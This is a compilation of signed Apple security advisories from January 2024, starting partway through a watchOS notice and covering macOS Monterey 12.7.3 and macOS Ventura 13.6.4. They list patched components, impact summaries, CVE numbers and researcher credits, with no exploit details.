CVE-2024-23204: Jubaer Alnazi (@h33tjubaer)

Shortcuts  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to bypass certain Privacy preferences  
Description: A privacy issue was addressed with improved handling of  
temporary files.  
CVE-2024-23217: Kirin (@Pwnrin)

TCC  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: An issue was addressed with improved handling of temporary  
files.  
CVE-2024-23215: Zhongquan Li (@Guluisacat)

Time Zone  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to view a user's phone number in system logs  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23210: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: An access issue was addressed with improved access  
restrictions.  
WebKit Bugzilla: 262699  
CVE-2024-23206: an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 266619  
CVE-2024-23213: Wangtaiyu of Zhongfu info

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDqsACgkQX+5d1TXa  
IvqR0Q//a137PlcPioIws/A02XClBQtF95fwuaz7DEhi79XZvH1q1+N3EYd/1b8l  
YkGdXQik8uS4zpB4KBJ+8cRYqaNaMDO0lNr2RdGgUInMd2bc+HBHigxEY47Wzbr2  
UT3r2uJW70HalBNrGNOj15JQTQ4MhbjjTq/ezrIdCFTo1RHk9vOc//AajbDtWiQp  
X5jGhoGzDB378vswEEyp4OjArh5v2xEv5hcoIvrzlgkSz9aRwzLgluR7sXGifE6O  
vU7zP2oT36zwBAfTsY1CkarTeQprQ4iyiEIlDzwxr+Z2ooGUmOStzsQtuU28QSQK  
sl0b42V7mkTFWVCXymsjCBbGw/JPSkGzptOPNqoEtBddiMuLU2BGBWk51xa5cEzy  
tsLWd1vlnUms3CqM6QvOxdj3mzs4wzxha941a0h67lR7NeR09CqflKsr7vDFWOBY  
PdVAUSDRxeM1rntVJfFJAkssUV14TGSTDwqMQmiUyxqXfKymSc4dCqIDLyqcdblB  
wNtwKFlstCZxcmc2V0zfDWHJ0y75sTUUhlk3AvH/OeVve9rhDvtKdoKDHdOauKHw  
kss00oy5TLkeTYi26oJfEMtts7BS+8ZEF3cLNxOBZ/cdIO1+Ifl8jNcluTLlC8F7  
4MxcjC8prTl0aZ4sqJfcUBLnqkMdn0GaqXOPXSa6hQxiNc5dcIk=  
=hoM+  
-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-8

Apple Security Advisory 01-22-2024-7 - macOS Monterey 12.7.3 addresses code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-01-22-2024-7 macOS Monterey 12.7.3

macOS Monterey 12.7.3 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214057.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Accessibility  
Available for: macOS Monterey  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-42937: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Apple Neural Engine  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23212: Ye Zhang of Baidu Security

curl  
Available for: macOS Monterey  
Impact: Multiple issues in curl  
Description: Multiple issues were addressed by updating to curl version  
8.4.0.  
CVE-2023-38545  
CVE-2023-38039  
CVE-2023-38546  
CVE-2023-42915

ImageIO  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted image may result in disclosure  
of process memory  
Description: The issue was addressed with improved checks.  
CVE-2023-42888: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

Mail Search  
Available for: macOS Monterey  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and  
Ian de Marcellus

WebKit  
Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
exploited.  
Description: A type confusion issue was addressed with improved checks.  
WebKit Bugzilla: 267134  
CVE-2024-23222

macOS Monterey 12.7.3 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDnUACgkQX+5d1TXa  
Ivqrqw//QZOnZpH5CnbfH10rxFF0CbZFRcHClM3RutihC4AuO5FedR3EDnUGyp53  
eJADLlNz3dTg15scv6P4AuT+hg8k3OFEPi1f2jVgRxlqsW8a15iIXYGti8y4UVwo  
kQgzfxYv33zuY0yWlIlERIP7imIT0jNgwFKn+Gs2ZaBq1xw52xq3I/jf97txAQHX  
Rpe35hnhYS7eGlB8spErKGBgyTuOf+piL7zccb+G/Hw6Y8AwSLsvXg3lSgZavEWE  
UIBoYGLycszT9U7tybuPUJ83jD0lIqFNhGNzHM6BnajYJ8SVdAXqVfid8Km9ixoi  
Sm73F6ZlCrUSLxihjXz92NQnBXJM2AxVI3Z1QqsqxOTS9yrkHYSgFgqUxxaP7ONt  
voHYw6fuycYca9TbFPmu6aStW1UBNwMLWYgjxbuTqqs+OEI8DKGcHIihGPQ184jW  
VF1bYNK8bvRMM+n/kaIHNo9/AyPnnSjmEOzr946ypg90FvTy3Wu1HhUm1MslzjNC  
LG5j6/hh0H7MXii8o5UL4ayabnPyZbWJrhRntvwx86xTLV9DPwmuwvxeVWm87Wu0  
EYC/XRAbtspHXMn5ItTNgqGbf0lKlrluXrAW79EFQdvPyD/Fzyljb+W9o2w1IA/9  
O8oXMVxqM4W+iRokcDbcbNQI3J2xGaP8FNwG6EEBB+bKkNWZ0m0=  
=zFhG  
-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-7

Apple Security Advisory 01-22-2024-6 - macOS Ventura 13.6.4 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-01-22-2024-6 macOS Ventura 13.6.4

macOS Ventura 13.6.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214058.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Apple Neural Engine  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23212: Ye Zhang of Baidu Security

Accessibility  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-42937: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Core Data  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2023-40528: Kirin (@Pwnrin) of NorthSea

curl  
Available for: macOS Ventura  
Impact: Multiple issues in curl  
Description: Multiple issues were addressed by updating to curl version  
8.4.0.  
CVE-2023-38545  
CVE-2023-38039  
CVE-2023-38546  
CVE-2023-42915

Finder  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: The issue was addressed with improved checks.  
CVE-2024-23224: Brian McNulty

ImageIO  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted image may result in disclosure  
of process memory  
Description: The issue was addressed with improved checks.  
CVE-2023-42888: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

LoginWindow  
Available for: macOS Ventura  
Impact: A local attacker may be able to view the previous logged in  
user’s desktop from the fast user switching screen  
Description: An authentication issue was addressed with improved state  
management.  
CVE-2023-42935

Mail Search  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and  
Ian de Marcellus

NSOpenPanel  
Available for: macOS Ventura  
Impact: An app may be able to read arbitrary files  
Description: An access issue was addressed with additional sandbox  
restrictions.  
CVE-2023-42887: Ron Masas of BreakPoint.sh

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
exploited.  
Description: A type confusion issue was addressed with improved checks.  
WebKit Bugzilla: 267134  
CVE-2024-23222

macOS Ventura 13.6.4 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDk0ACgkQX+5d1TXa  
IvrWTw/8DbDE/5ejAyR2F08VphoiOnJD5URY5WINPWVWps0w9svMI83Ig+MLlbVY  
APek5kQlSVJJoI7RXrSxgRCs3gcWVWVo08iVIM6woBbsd5JPaTYXe9/yUdRzWBX4  
zgOxvCh5wL4czXUV0ym4OMlDE5BZ3N+hEpyAIOJmNV7jkNnMshMWfeN6puFZgwt/  
FYt1BrU+MJ4PRA/A3B01ic3VQFnHifCE1jF/ebfb7DwZafK6EO2Hf91MNgAic5Td  
Q4TvwnHOqAq1N0cZa+SKNsStVx5Yk4J0ovNeecdQA2xNVfnd7jLaU1Y57SHjxNi9  
wbsENC3bTpZed+lMhDiBaRIj//Ej6KMeQKUNbcvPH5HCHP5YN68QFwkoA+QJdX66  
SH7jvDI6xgjlvVoNjqZ6bYHDr+CK5AB7fLDXhEGWBIssjce8AeaNPPA7JHMsVCen  
o7WXri4Bb7W4BwfpicTPlumkF+vva+nKYWvuAfob7v2yayeCa8vPKgrEPHXbCnWa  
8r1lqyQVqKL1wqS5RcpsHZEWrV2HF0hoKam4x3ZmLqNDhnVC0t8IipL0vqN+vzaU  
t26QZrpiW8V7CZRiXeCj5rDhv8Z1w+wEiuGLTqp9Z1JD/mCVy7Tmm2Y6RNYZw+jk  
lwpJpwqOpXbsCdx6kU28V8H1elS5cz3RdGCDex55lOlrMXp+KOs=  
=VoRh  
-----END PGP SIGNATURE-----

Tag

#webkit